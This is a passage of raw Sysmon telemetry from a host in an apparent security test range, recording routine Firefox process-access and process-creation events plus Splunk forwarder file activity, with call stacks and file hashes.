Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105021Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.058{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105020Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.058{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105019Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.058{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105018Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.058{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105017Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.058{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105016Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.058{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105015Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.058{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105014Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.058{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e 10341000x8000000000000000105013Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.058{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+e48ccc|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278 10341000x8000000000000000105012Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.058{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+e48c43|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7|C:\Program Files\Mozilla Firefox\xul.dll+1b73e11 10341000x8000000000000000105011Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.058{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+c2e55|C:\Program Files\Mozilla Firefox\xul.dll+e4891a|C:\Program Files\Mozilla Firefox\xul.dll+e4828c|C:\Program Files\Mozilla Firefox\xul.dll+e4a6e0|C:\Program Files\Mozilla Firefox\xul.dll+c6cf0f|C:\Program Files\Mozilla Firefox\xul.dll+c6a3d7|C:\Program Files\Mozilla Firefox\xul.dll+29283d|C:\Program Files\Mozilla Firefox\xul.dll+2923d1|C:\Program Files\Mozilla Firefox\xul.dll+f8f7e5|C:\Program Files\Mozilla Firefox\xul.dll+1777f6f|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+26cb90|C:\Program Files\Mozilla Firefox\xul.dll+23a9a5|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+184a149|C:\Program Files\Mozilla Firefox\xul.dll+1a5e24e|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7 10341000x8000000000000000105010Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.058{58E9C193-B422-615A-0602-00000000FC01}55525064C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+a0942f|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+166d71b|C:\Program Files\Mozilla Firefox\xul.dll+19cd045|C:\Program Files\Mozilla Firefox\xul.dll+13c95|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+13378|C:\Program Files\Mozilla Firefox\xul.dll+9f2211|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105009Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.058{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105008Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.042{58E9C193-B422-615A-0602-00000000FC01}55524268C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+2f07d|C:\Program Files\Mozilla Firefox\firefox.exe+2e285|C:\Program Files\Mozilla Firefox\xul.dll+1fd1d9a|C:\Program Files\Mozilla Firefox\xul.dll+a04e9a|C:\Program Files\Mozilla Firefox\xul.dll+a03065|C:\Program Files\Mozilla Firefox\xul.dll+a0a25e|C:\Program Files\Mozilla Firefox\xul.dll+8b1df0|C:\Program Files\Mozilla Firefox\xul.dll+167b2d9|C:\Program Files\Mozilla Firefox\xul.dll+2680a|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+8b45d7|C:\Program Files\Mozilla Firefox\nss3.dll+7647d|C:\Program Files\Mozilla Firefox\nss3.dll+8e401|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105007Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.042{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105006Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.042{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105005Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.042{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105004Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.042{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105003Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.055{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe92.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5552.1.604063170\489697950" -childID 1 -isForBrowser -prefsHandle 2444 -prefMapHandle 2440 -prefsLen 1626 -prefMapSize 235910 -jsInit 1076 285716 -parentBuildID 20210922161155 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5552 "\\.\pipe\gecko-crash-server-pipe.5552" 2456 2b091888f38 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92LowMD5=DBDB3EFACC3D9039A4F5703662099178,SHA256=534A44A08893AFBE78E04B4CFF80BD00BFC40562A923E8AF38E240227A643FFB,IMPHASH=AECE7B7E776840D7A7255A31B309B7E4{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 17141700x8000000000000000105002Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:58:30.027{58E9C193-B422-615A-0602-00000000FC01}5552\chrome.5552.1.60406317C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000105001Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.027{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105000Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.027{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92A93D1FA2CEF694DC43B9B47CCF0D60,SHA256=6DF67D48356C51A5D27B29C0875864FE613617517DC43E9B7AA2A05FC8739F7B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104999Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.011{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla 